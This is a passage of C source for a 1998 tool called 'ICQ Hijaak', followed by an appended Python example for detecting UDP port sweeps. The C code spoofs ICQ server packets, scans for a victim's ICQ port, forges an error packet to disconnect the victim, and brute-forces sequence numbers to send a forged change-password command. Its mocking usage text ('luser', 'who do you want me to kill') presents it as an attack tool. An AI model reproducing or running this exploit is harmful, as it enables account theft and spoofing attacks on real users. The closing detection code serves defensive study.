  pchecksum = ( ~cksum( (u16 *)&chdr, UCHDR_END / 2 ) ) & 0xFFFF;
  if ( udplength & 1 )
  {
    byte( *udp, udplength + 1 ) = 0;
  }
  pchecksum += ( ~cksum((u16 *)udp, udplength/ 2 + (udplength&1)) ) & 0xFFFF;
  pchecksum += ( pchecksum >> 16 );
  word( *udp, UDP_CHECKSUM ) = (u16)~pchecksum ;
}

int CreateRawSocket( void )
{
  int s;
  int option;

  s = socket( AF_INET, SOCK_RAW, IPPROTO_RAW );
  if ( s < 0 )
  {
    perror("Socket:");
    exit(-1);
  }
  option = 1;
  if ( setsockopt( s, IPPROTO_IP, IP_HDRINCL, (char *)&option, sizeof( option ) ) < 0 )
  {
    perror("Setting IP_HDRINCL");
    exit(0);
  }
  return s;
}

int GetLocalAddress( struct in_addr remote, struct in_addr * local )
{
  struct sockaddr_in laddress;
  struct sockaddr * laddr = (struct sockaddr *)&laddress;
  struct sockaddr_in raddress;
  struct sockaddr * raddr = (struct sockaddr *)&raddress;
  int s;
  int err;
  int len;

  s = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP );
  if ( s < 1 )
  {
    return FAILURE;
  }
  raddress.sin_port = htons( 1984 ); /* DON'T CARE */
  raddress.sin_family = AF_INET;
  raddress.sin_addr = remote;
  err = connect(s, raddr, sizeof(raddress ));
  if ( err < 0 )
  {
    return FAILURE;
  }
  len = sizeof(laddress);
  err = getsockname(s, laddr, &len );
  if ( err < 0 )
  {
    return FAILURE;
  }
  *local = laddress.sin_addr;
  close(s);
  return SUCCESS;
}

int CreateICMPSocket( void )
{
  int s;

  s = socket( AF_INET, SOCK_RAW, IPPROTO_ICMP );
  if ( s < 1 )
    return FAILURE;
  return s;
}

int SendUDP( int s, struct in_addr source, struct in_addr dest, u16 sport, u16 tport )
{
  static u8 packet[576];
  struct sockaddr_in raddress;
  struct sockaddr * raddr = (struct sockaddr *)&raddress;
  int psize;
  int err;

  raddress.sin_port = htons( 1984 ); /* DON'T CARE */
  raddress.sin_family = AF_INET;
  raddress.sin_addr = dest;
  psize = IP_END + UDP_END + 6;
  make_ip_hdr( packet, psize, IPPROTO_UDP, 0x666, 0, source, dest, 0x7F );
  make_udp_hdr( packet, psize - IP_END, sport, tport);
  err = sendto( s, packet, psize, 0,raddr, sizeof(raddress));
  if ( err != psize )
  {
    perror("Sending");
    return FAILURE;
  }
  return SUCCESS;
}

const int verify_secs = 2;

int VerifyUDPPort( struct in_addr addr, u16 port )
{
  int s_icmp;
  struct timeval start_time, end_time, wait_time;
  fd_set rdfs;
  int err;
  static u8 packet[1500]; /* should be max MTU */
  struct sockaddr junkaddr;
  int junksize;
  u8 * icmphdr;
  u8 * fiphdr;
  u8 * fudphdr;
  int len;
  int got_unreach;
  struct in_addr localaddr;
  int rawsock;

  if ( GetLocalAddress(addr, &localaddr) == FAILURE )
  {
    perror("GetLocalAddress");
    exit(-1);
  }
  s_icmp = CreateICMPSocket();
  if ( s_icmp == FAILURE )
  {
    perror("Getting ICMP socket");
    exit(-1);
  }
  rawsock = CreateRawSocket();
  if ( rawsock < 0 )
  {
    perror("Getting Raw socket");
    exit(-1);
  }
  FD_ZERO( &rdfs );
  FD_SET( s_icmp, &rdfs );
  if ( SendUDP(rawsock, localaddr, addr, 0x1984, port ) == FAILURE )
  {
    perror("Sending UDP packet");
    exit(-1);
  }
  got_unreach = 0;
  gettimeofday( &start_time, NULL );
  do
  {
    wait_time.tv_usec = 0;
    wait_time.tv_sec = verify_secs;
    err = select( s_icmp+1, &rdfs, NULL, NULL, &wait_time );
    if ( -1 == err )
    {
      perror("VerifyUDPPort - Select");
      exit(-1);
    }
    if ( !err )
      break;
    junksize = sizeof( struct sockaddr );
    err = recvfrom( s_icmp, packet, 1500, 0, &junkaddr, &junksize );
    if ( -1 == err )
    {
      perror("VerifyUDPPort - recvfrom: ");
      exit(-1);
    }
    if ( (byte(*packet,IP_PROTOCOL ) != IPPROTO_ICMP ) ||
         (dword(*packet, IP_SRC ) != *((u32 *)&addr) ) )
      goto check_timeout;
    len = ( byte(*packet, 0 ) & 0x0F ) * 4;
    icmphdr = packet + len;
    if ( (byte(*icmphdr,ICMP_TYPE ) != 3 ) ||
         (byte(*icmphdr,ICMP_CODE ) != 3 ) )
      goto check_timeout;
    fiphdr = icmphdr + ICMP_END + 4/*clear error code*/;
    len = ( byte(*fiphdr, 0 ) & 0x0F ) * 4;
    if ( (byte(*fiphdr,IP_PROTOCOL ) != IPPROTO_UDP ) ||
         ( (dword(*fiphdr, IP_DST ) != *((u32 *)&addr) ) ) )
      goto check_timeout;
    fudphdr = fiphdr + len;
    if ( word(*fudphdr, UDP_DEST ) == htons( port ) )
    {
      got_unreach = 1;
      break;
    }
check_timeout:
    gettimeofday( &end_time, NULL );
  } while ( ( end_time.tv_sec - start_time.tv_sec ) < verify_secs );
  close( s_icmp );
  close( rawsock);
  if ( got_unreach )
    return FAILURE;
  else
    return SUCCESS;
}

typedef struct foobar
{
  int next;
  int prev;
  u16 rem_port;
  int times;
} port_info;

#define MAX_BURST 128
#define UNUSED_HEAD MAX_BURST + 1
#define UNUSED_TAIL MAX_BURST + 2
#define LIVE_HEAD MAX_BURST + 3
#define LIVE_TAIL MAX_BURST + 4
#define FIRST_LPORT 55000
#define SEND_COUNT 3
#define NEXT(i) List[(i)].next
#define PREV(i) List[(i)].prev
#define PORT(i) List[(i)].rem_port
#define TIMES(i) List[(i)].times

int UDPScan( struct in_addr addr, u16 start, u16 end, u16 * tport )
{
  int unused_head;
  int unused_tail;
  int live_head;
  int live_tail;
  int i;
  port_info List[ LIVE_TAIL + 1 ];
  int Current[ MAX_BURST ];
  int cur_min, cur_max;
  int now_port;
  int delay;
  int my_port;
  int cur_send;
  struct timeval wait_time;
  fd_set rdfs;
  int err;
  int s_icmp, rawsock;
  struct in_addr localaddr;

  *tport = 0;
  if ( GetLocalAddress(addr, &localaddr) == FAILURE )
  {
    perror("GetLocalAddress");
    return FAILURE;
  }
  s_icmp = CreateICMPSocket();
  if ( s_icmp == FAILURE )
  {
    perror("Getting ICMP socket");
    return FAILURE;
  }
  rawsock = CreateRawSocket();
  if ( rawsock < 0 )
  {
    perror("Getting Raw socket");
    return FAILURE;
  }
  FD_ZERO( &rdfs );
  FD_SET( s_icmp, &rdfs );
  List[ LIVE_TAIL ].next = -1;
  List[ LIVE_TAIL ].prev = LIVE_HEAD;
  List[ LIVE_TAIL ].rem_port = 0;
  List[ LIVE_HEAD ].prev = -1;
  List[ LIVE_HEAD ].next = LIVE_TAIL;
  List[ LIVE_HEAD ].rem_port = 0;
  List[ UNUSED_TAIL ].next = -1;
  List[ UNUSED_TAIL ].prev = UNUSED_HEAD;
  List[ UNUSED_TAIL ].rem_port = 0;
  List[ UNUSED_HEAD ].prev = -1;
  List[ UNUSED_HEAD ].next = UNUSED_TAIL;
  List[ UNUSED_HEAD ].rem_port = 0;
  for ( i = 0; i < MAX_BURST ; i++ )
  {
    PREV( i ) = PREV( UNUSED_TAIL );
    NEXT( i ) = UNUSED_TAIL;
    NEXT( PREV( i ) ) = i;
    PREV( NEXT( i ) ) = i;
    PORT( i ) = 0;
TIMES( i ) = SEND_COUNT; } now_port = start; cur_min = now_port; cur_max = MAX_BURST; my_port = FIRST_LPORT; cur_send = 16; while ( 1 ) { int cur; int cnt; cur_max = cur_send; cur_min = now_port; cur = List[ LIVE_HEAD ].next; cnt = 0; while ( NEXT(cur) != -1 ) { if (!cur_max ) { break; } cnt++; if ( SendUDP(rawsock, localaddr, addr, my_port, PORT(cur) ) == FAILURE ) { perror("Sending UDP packet"); return FAILURE; } cur_max--; TIMES(cur)--; cur = NEXT(cur); if ( NEXT(cur) > LIVE_TAIL ) { printf("Ugh! %d \n", NEXT(cur) ); exit(-1); } } for ( i = 0; i < cur_max ; i ++ ) { int node; if ( cur_min > end ) break; node = NEXT( UNUSED_HEAD ); if ( -1 == NEXT( node ) ) break; NEXT( UNUSED_HEAD ) = NEXT( node ); PREV( NEXT(node) ) = UNUSED_HEAD; PREV( node ) = PREV( LIVE_TAIL ); NEXT( node ) = LIVE_TAIL; NEXT( PREV( node ) ) = node; PREV( NEXT( node ) ) = node; PORT( node ) = cur_min + i; if ( SendUDP(rawsock, localaddr, addr, my_port, cur_min+i ) == FAILURE ) { perror("Sending UDP packet"); return FAILURE; } Current[ i ] = node; } if ( ( now_port >= end ) && ( !cnt ) ) { printf("Found nothing!\n"); return SUCCESS; } now_port += cur_max; /* * Delay, waiting for responses. Continue until the * operation times out, meaning that we waited long enough * for a packet.. 
*/ cnt = 0; while ( 1 ) { int junksize; static struct sockaddr junkaddr; static u8 packet[1500]; int len; u8 * icmphdr, * fiphdr, *fudphdr; int got_port; int cur; wait_time.tv_usec = 0; wait_time.tv_sec = 5; FD_SET( s_icmp, &rdfs ); err = select( s_icmp+1, &rdfs, NULL, NULL, &wait_time ); if ( -1 == err ) { perror("UDPSCAN - Select"); return FAILURE; } if ( !err ) { break; } junksize = sizeof( struct sockaddr ); err = recvfrom( s_icmp, packet, sizeof(packet), 0, &junkaddr, &junksize ); if ( -1 == err ) { perror("UDPSCAN - recvfrom: "); exit(-1); } if ( (byte(*packet,IP_PROTOCOL ) != IPPROTO_ICMP ) || (dword(*packet, IP_SRC ) != *((u32 *)&addr) ) ) continue; len = ( byte(*packet, 0 ) & 0x0F ) * 4; icmphdr = packet + len; if ( (byte(*icmphdr,ICMP_TYPE ) != 3 ) || (byte(*icmphdr,ICMP_CODE ) != 3 ) ) continue; fiphdr = icmphdr + ICMP_END + 4/*clear error code*/; len = ( byte(*fiphdr, 0 ) & 0x0F ) * 4; if ( (byte(*fiphdr,IP_PROTOCOL ) != IPPROTO_UDP ) || ( (dword(*fiphdr, IP_DST ) != *((u32 *)&addr) ) ) ) continue; fudphdr = fiphdr + len; got_port = ntohs( word(*fudphdr, UDP_DEST ) ) ; if ( ( got_port >= cur_min ) && ( got_port < (cur_min+cur_max) ) ) { cur = Current[ got_port - cur_min ]; PREV( NEXT(cur) ) = PREV( cur ); NEXT( PREV(cur) ) = NEXT( cur ); PREV( cur ) = PREV( UNUSED_TAIL ); NEXT( cur ) = UNUSED_TAIL; NEXT( PREV( cur ) ) = cur; PREV( NEXT( cur ) ) = cur; cnt++; continue; } /* * if we get here, then it was one of the older * ones, so look through the array for it */ cur = NEXT( LIVE_HEAD ); while ( NEXT(cur) != -1 ) { if ( PORT(cur) == got_port ) { PREV( NEXT(cur) ) = PREV( cur ); NEXT( PREV(cur) ) = NEXT( cur ); PREV( cur ) = PREV( UNUSED_TAIL ); NEXT( cur ) = UNUSED_TAIL; NEXT( PREV( cur ) ) = cur; break; } cur = NEXT(cur); } if ( NEXT(cur) == -1 ) { printf("RESPONSE FOR PORT %d UNEXPECTED! 
\n", got_port); } else { cnt++; } } printf("[UDP Scan working] Got %d responses \n", cnt ); if ( cnt < ( (cur_send/4) * 3 ) ) { cur_send /= 2; if ( cur_send < 16 ) { cur_send = 16; } } else { cur_send *= 2; if ( cur_send > MAX_BURST ) { cur_send = MAX_BURST; } } cur = NEXT( LIVE_HEAD ); while ( NEXT(cur) != -1 ) { if (!TIMES(cur) ) { printf("SCORE! Port is %d \n",PORT(cur)); close( s_icmp ); close( rawsock); *tport = PORT(cur); return SUCCESS; } cur = NEXT(cur); } } close( s_icmp ); close( rawsock); return SUCCESS; } #define COMMAND_CHANGEPASSWORD 0x049C #define COMMAND_LOGOFF 0x0438 #define RESPONSE_ERROR 0x00F0 int WritePacket(u8 * data_ptr, int * size, char * format, ... ) { u8 * ptr; va_list ap; u32 dword_param; u16 word_param; u8 byte_param; u8 * string_param; int string_length; int * data_length; ap = va_start( ap, format ); ptr = data_ptr; while ( *format ) { switch ( *format++ ) { case 'L': /* dword */ dword_param = va_arg(ap, u32 ); *(ptr++) = dword_param & 0xFF; *(ptr++) = (dword_param >> 8 ) & 0xFF; *(ptr++) = (dword_param >> 16) & 0xFF; *(ptr++) = (dword_param >> 24) & 0xFF; break; case 'W': /* word */ word_param = va_arg(ap, u16 ); *(ptr++) = word_param & 0xFF; *(ptr++) = (word_param >> 8 ) & 0xFF; break; case 'B': /* Byte */ byte_param = va_arg(ap, u8 ); *(ptr++) = byte_param; break; case 'S': /* ICQ string */ string_param = va_arg(ap, u8 * ); string_length = strlen( string_param ) + 1; *(ptr++) = (string_length ) & 0xFF; *(ptr++) = (string_length >> 8) & 0xFF; memcpy( ptr, string_param, string_length ); ptr += string_length; break; case 'D': /* pure data with length byte */ data_length = va_arg(ap, int * ); string_param = va_arg(ap, u8 * ); memcpy( ptr, string_param , *data_length ); ptr += *data_length; break; default: fprintf(stderr,"Invalid type %c \n", *(format-1) ); return FAILURE; } } /* return the size taken up */ *size = (ptr - data_ptr ); return SUCCESS; } u32 icq_uin = -1; u16 icq_seq = 0; u16 icq_seq2 = 0; #define ICQ4_VER 0 #define 
ICQ4_RANDOM 2 #define ICQ4_ZERO 4 #define ICQ4_COMMAND 6 #define ICQ4_SEQ 8 #define ICQ4_SEQ2 10 #define ICQ4_UID 12 #define ICQ4_CHECK 16 #define ICQ4_END 20 void create_icq4_hdr( u8 * data_ptr, u16 any_number, u16 command, int data_size ) { u32 check; u32 check2; u32 keyvalue; int count; int length; int i; u8 ofs; u8 val; length = data_size + ICQ4_END; memset( data_ptr, 0, ICQ4_END ); word(*data_ptr, ICQ4_VER ) = 0x4; word(*data_ptr, ICQ4_RANDOM) = any_number; word(*data_ptr, ICQ4_COMMAND ) = command; word(*data_ptr, ICQ4_SEQ ) = icq_seq; word(*data_ptr, ICQ4_SEQ2 ) = icq_seq2; dword(*data_ptr,ICQ4_UID ) = icq_uin; dword(*data_ptr,ICQ4_CHECK) = 0x0; check = ( *(data_ptr + 8) << 24) | ( *(data_ptr + 4) << 16 ) | ( *(data_ptr + 2) << 8 ) | ( *(data_ptr + 6) ); ofs = random() % length; val = *(data_ptr + ofs ); check2 = ( ofs << 24 ) | ( val << 16 ); ofs = random() % 256; val = icq_check_data[ ofs ]; check2 |= ( ofs << 8 ) | ( val ); check2 ^= 0x00FF00FF; check ^= check2; dword(*data_ptr,ICQ4_CHECK ) = check; keyvalue = length * 0x66756B65; keyvalue += check; count = ( length + 3 ) / 4; count += 3; count /= 4; for ( i = 0; i < count ; i++ ) { u32 * r; if ( i == 4 ) continue; r = (u32 *)(data_ptr + (i*4) ); *r ^= (keyvalue + icq_check_data[i*4] ); } word(*data_ptr, ICQ4_VER ) = 0x4; /* NECESSARY! 
*/ } void create_icq3_header( u8 * data_ptr, int * size, u16 command, u16 seq1, u16 seq2, u32 UIN ) { int len, len2, err, ofs, val; u32 check, check2; err = WritePacket( data_ptr,&len, "WWWWL", 0x03, command, seq1, seq2, UIN ); if ( err == FAILURE ) { printf("Programmer Error in create_icq3_header\n"); exit(-1); } check = ( *(data_ptr + 8) << 24) | ( *(data_ptr + 4) << 16 ) | ( *(data_ptr + 2) << 8 ) | ( *(data_ptr + 6) ); ofs = random() % len; val = *(data_ptr + ofs ); check2 = ( ofs << 24 ) | ( val << 16 ); ofs = random() % 256; val = icq_check_data[ ofs ]; check2 |= ( ofs << 8 ) | ( val ); check2 ^= 0x00FF00FF; check ^= check2; err = WritePacket( (data_ptr + len),&len2,"L", check ); *size = len + len2; } static u8 packet[ 1500 ]; void main( int argc, char ** argv ); void main( int argc, char ** argv ) { int count; int i; u16 j, k; struct in_addr * addr_list; struct in_addr * target_list; int err; struct in_addr you; struct in_addr me; int rawsock; struct sockaddr raddr; struct sockaddr_in * r_in = (struct sockaddr_in *)&raddr; int size; u8 * data_ptr; u8 * hdr_ptr; int hdr_size; u16 your_port; int retries; int base_port; if ( argc < 5 ) { fprintf(stderr, "--=--==[ ICQ Hijaak ]=====------------------------==--------------\n" "Author: wumpus@innocent.com * Copyright (c) 1998 Wolvesbane\n" "[ http://www.rootshell.com/ ] - Usage: \n" " hijaak [options] icq-server target-uin target-ip new-password \n" "\n" "icq-server: Packets will be *spoofed* from the (possibly plural) \n" " IP addresses of this parameter. \n" "\n" "target-uin: D'Oh! \n\n" "target-ip: Finding this is up to you. May the farce be with you\n" "\nnew-password: D'Oh! Take a guess \n" "\nNo options are available at this time.\n" ); exit(-1); } base_port = 0; if ( argc > 5 ) { base_port = atoi( argv[5] ); } if (!base_port) base_port = 1024; icq_uin = atol( argv[2] ); if ( !icq_uin ) { fprintf(stderr, "Who do you want me to kill, boss? 
\n"); exit(-1); } err = MultiResolve(argv[3],&count,&target_list); if ( err == -1 ) { herror("Resolving target\n"); exit(-1); } if ( count > 1 ) { fprintf(stderr, "Hey! Moron! You need to specify an UNAMBIGUOUS victim IP. \n" ); exit(-1); } you = target_list[0]; free( target_list ); err = MultiResolve(argv[1],&count,&addr_list); if ( err == -1 ){ herror("Resolving ICQ server"); exit(-1); } r_in->sin_port = htons( 1984 ); /* DON'T CARE */ r_in->sin_family = AF_INET; r_in->sin_addr = you; hdr_ptr = packet + IP_END + UDP_END; rawsock = CreateRawSocket(); printf("** Scanning for luser's ICQ port ...\n"); your_port = base_port; while ( 1 ) { err = UDPScan(you, your_port, 65535, &your_port ); if ( ( err == -1 ) || ( !your_port ) ) { fprintf(stderr, "D'Oh! Can't find a target port. Better check that target IP again!\n"); exit(-1); } if ( FAILURE == VerifyUDPPort( you, your_port ) ) { fprintf(stderr, "UDP scan found invalid port. Retrying... Hit CTRL-C to exit\n"); continue; } break; } printf("*** Got luser's port at %d \n", your_port ); create_icq3_header(hdr_ptr, &hdr_size, RESPONSE_ERROR, 0, 0, icq_uin ); retries = 3; while ( retries-- ) { printf("Trying to knock luser offline. Attempt %d\n", 3 - retries ); for ( i = 0; i < count ; i++ ) { int psize; psize = IP_END + UDP_END + hdr_size; make_ip_hdr( packet, psize, IPPROTO_UDP, 0x666, 0, addr_list[i], you, 0x7F ); make_udp_hdr( packet, psize - IP_END, 4000,your_port ); err = sendto( rawsock, packet, psize, 0, &raddr, sizeof(raddr)); if ( err != psize ) { perror("Sending"); exit(-1); } } if ( FAILURE == VerifyUDPPort( you, your_port ) ) { break; } sleep( 3 ); /* Give 'em some time */ if ( FAILURE == VerifyUDPPort( you, your_port ) ) { break; } sleep(3); } printf("Retries is %d \n", retries ); if ( 0 > retries ) { fprintf(stderr, "Uh Oh! Something ain't working. Can't toast the luser. Sorry, dude.\n"); exit(-1); } /* more time? how long does it take to reconnect? 
*/ sleep(16); printf("** Scanning for luser's _new_ ICQ port ...\n"); while ( 1 ) { err = UDPScan(you, your_port, 65535, &your_port ); if ( ( err == -1 ) || ( !your_port ) ) { fprintf(stderr, "D'Oh! Can't find the new port! Maybe your target is smarter than you?\n"); exit(-1); } if ( FAILURE == VerifyUDPPort( you, your_port ) ) { fprintf(stderr, "New UDP scan found invalid port. Retrying... Hit CTRL-C to exit\n"); continue; } break; } printf("*** Got luser's new connection at %d \n", your_port ); printf("*** Hijaaking account now...(*LONG* version)\n"); for ( k = 0; k < 14 ; k++ ) { for ( j = 0; j < 14 ; j++ ) { int psize; icq_seq = k; icq_seq2 = j; data_ptr = hdr_ptr + ICQ4_END; WritePacket( data_ptr, &size, "S",argv[4] ); create_icq4_hdr(hdr_ptr, random()&0xFFFF, COMMAND_CHANGEPASSWORD, size ); hdr_size = ICQ4_END; for ( i = 0; i < count ; i++ ) { psize = IP_END + UDP_END + hdr_size + size; make_ip_hdr( packet, psize, IPPROTO_UDP, 0x666, 0, you, addr_list[i], 0x7F ); make_udp_hdr( packet, psize - IP_END, your_port, 4000); err = sendto( rawsock, packet, psize, 0, &raddr, sizeof(raddr)); if ( err != psize ) { perror("Sending"); exit(-1); } usleep( 1000 ); err = sendto( rawsock, packet, psize, 0, &raddr, sizeof(raddr)); if ( err != psize ) { perror("Sending"); exit(-1); } } } } printf("Disconnecting the remote luser... \n"); create_icq3_header(hdr_ptr, &hdr_size, RESPONSE_ERROR, 0, 0, icq_uin ); for ( i = 0; i < count ; i++ ) { int psize; psize = IP_END + UDP_END + hdr_size; make_ip_hdr( packet, psize, IPPROTO_UDP, 0x666, 0, addr_list[i], you, 0x7F ); make_udp_hdr( packet, psize - IP_END, 4000,your_port ); err = sendto( rawsock, packet, psize, 0, &raddr, sizeof(raddr)); if ( err != psize ) { perror("Sending"); exit(-1); } } free( addr_list ); } -----------Corte aqui 1998 FW - Corporation <><><><><><><><><><><><><>
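The scanner above works entirely off ICMP "port unreachable" replies: it probes a range of UDP ports and treats the port that never answers as the one ICQ is listening on. Seen from the network being probed, that same traffic is a recognisable pattern, and the following is an added defender-side example (not code from the zine or from the ICQ Hijaak source above) that shows the two packet-handling pieces involved: the RFC 768 UDP checksum over the IPv4 pseudo-header, which make_udp_hdr() computes, and the decoding of an ICMP type 3 / code 3 message back to the UDP destination port that was probed, as UDPScan() and VerifyUDPPort() do. A small counter then flags a host that has been told "port unreachable" for many distinct ports by the same peer. Every packet is constructed inline; the IP addresses, ports and the threshold are made-up sample values.

```python
"""Defender-side parser for UDP probes and ICMP port-unreachable replies (added example)."""
import struct
from collections import defaultdict
from ipaddress import IPv4Address

UDP_PROTO, ICMP_PROTO = 17, 1


def ones_complement_sum(data: bytes) -> int:
    """16-bit one's complement sum used by the IP, UDP and ICMP checksums."""
    if len(data) & 1:
        data += b"\x00"  # pad an odd length with a zero byte, as make_udp_hdr does
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return total


def pseudo_header(src: str, dst: str, udp_len: int) -> bytes:
    """RFC 768 pseudo-header: src, dst, zero byte, protocol 17, UDP length."""
    return IPv4Address(src).packed + IPv4Address(dst).packed + struct.pack("!BBH", 0, UDP_PROTO, udp_len)


def udp_checksum(src: str, dst: str, udp: bytes) -> int:
    """Checksum value to place in the UDP header (checksum field must be zero in `udp`)."""
    csum = (~ones_complement_sum(pseudo_header(src, dst, len(udp)) + udp)) & 0xFFFF
    return csum or 0xFFFF  # a computed zero is transmitted as 0xFFFF (zero means "no checksum")


def udp_checksum_ok(src: str, dst: str, udp: bytes) -> bool:
    """Validate a received datagram; a zero field means the sender disabled the checksum."""
    if struct.unpack("!H", udp[6:8])[0] == 0:
        return True
    return ones_complement_sum(pseudo_header(src, dst, len(udp)) + udp) == 0xFFFF


def build_udp(src: str, dst: str, sport: int, dport: int, payload: bytes = b"") -> bytes:
    hdr = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    return hdr[:6] + struct.pack("!H", udp_checksum(src, dst, hdr + payload)) + payload


def build_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Minimal 20-byte IPv4 header (no options) with a correct header checksum."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0, 64, proto, 0,
                      IPv4Address(src).packed, IPv4Address(dst).packed)
    csum = (~ones_complement_sum(hdr)) & 0xFFFF
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:] + payload


def build_port_unreachable(probe_src: str, probe_dst: str, sport: int, dport: int) -> bytes:
    """What probe_dst sends back when nothing listens on dport: ICMP 3/3 quoting the probe.

    Constructed sample traffic: the quoted part is the offending IP header plus the first
    8 bytes of the UDP header, which is exactly what the parser below relies on."""
    inner = build_ipv4(probe_src, probe_dst, UDP_PROTO, build_udp(probe_src, probe_dst, sport, dport))
    body = struct.pack("!BBHI", 3, 3, 0, 0) + inner[:28]
    icmp = body[:2] + struct.pack("!H", (~ones_complement_sum(body)) & 0xFFFF) + body[4:]
    return build_ipv4(probe_dst, probe_src, ICMP_PROTO, icmp)


def parse_port_unreachable(packet: bytes):
    """Return (scanner_ip, scanned_ip, probed_port) for an ICMP port-unreachable, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != ICMP_PROTO or len(packet) < ihl + 8:
        return None
    scanned, scanner = str(IPv4Address(packet[12:16])), str(IPv4Address(packet[16:20]))
    icmp = packet[ihl:]
    if icmp[0] != 3 or icmp[1] != 3:  # type 3 (unreachable), code 3 (port)
        return None
    inner = icmp[8:]  # quoted IP header of the datagram that was rejected
    if len(inner) < 20 or inner[9] != UDP_PROTO:
        return None
    inner_ihl = (inner[0] & 0x0F) * 4
    if len(inner) < inner_ihl + 8 or str(IPv4Address(inner[16:20])) != scanned:
        return None  # the quoted datagram must have been addressed to the replying host
    port = struct.unpack("!H", inner[inner_ihl + 2:inner_ihl + 4])[0]
    return scanner, scanned, port


def flag_udp_sweeps(packets, threshold: int = 8):
    """Count distinct unreachable ports per (scanner, scanned) pair; flag pairs at/over threshold."""
    seen = defaultdict(set)
    for pkt in packets:
        parsed = parse_port_unreachable(pkt)
        if parsed is not None:
            scanner, scanned, port = parsed
            seen[(scanner, scanned)].add(port)
    return {pair: len(ports) for pair, ports in seen.items() if len(ports) >= threshold}


if __name__ == "__main__":
    # Constructed sample: one peer probing ten consecutive ports on one host.
    sample = [build_port_unreachable("203.0.113.5", "198.51.100.7", 55000, p) for p in range(4000, 4010)]
    print(parse_port_unreachable(sample[0]))
    print(flag_udp_sweeps(sample))
```

The scanner on this page deliberately keys on the absence of a reply, so a firewall that silently drops instead of answering with ICMP port unreachable makes every port look "open" to it; that is the edge case the silent-port logic in UDPScan() cannot distinguish, and rate-limiting outbound ICMP unreachables has the same effect from the defender's side.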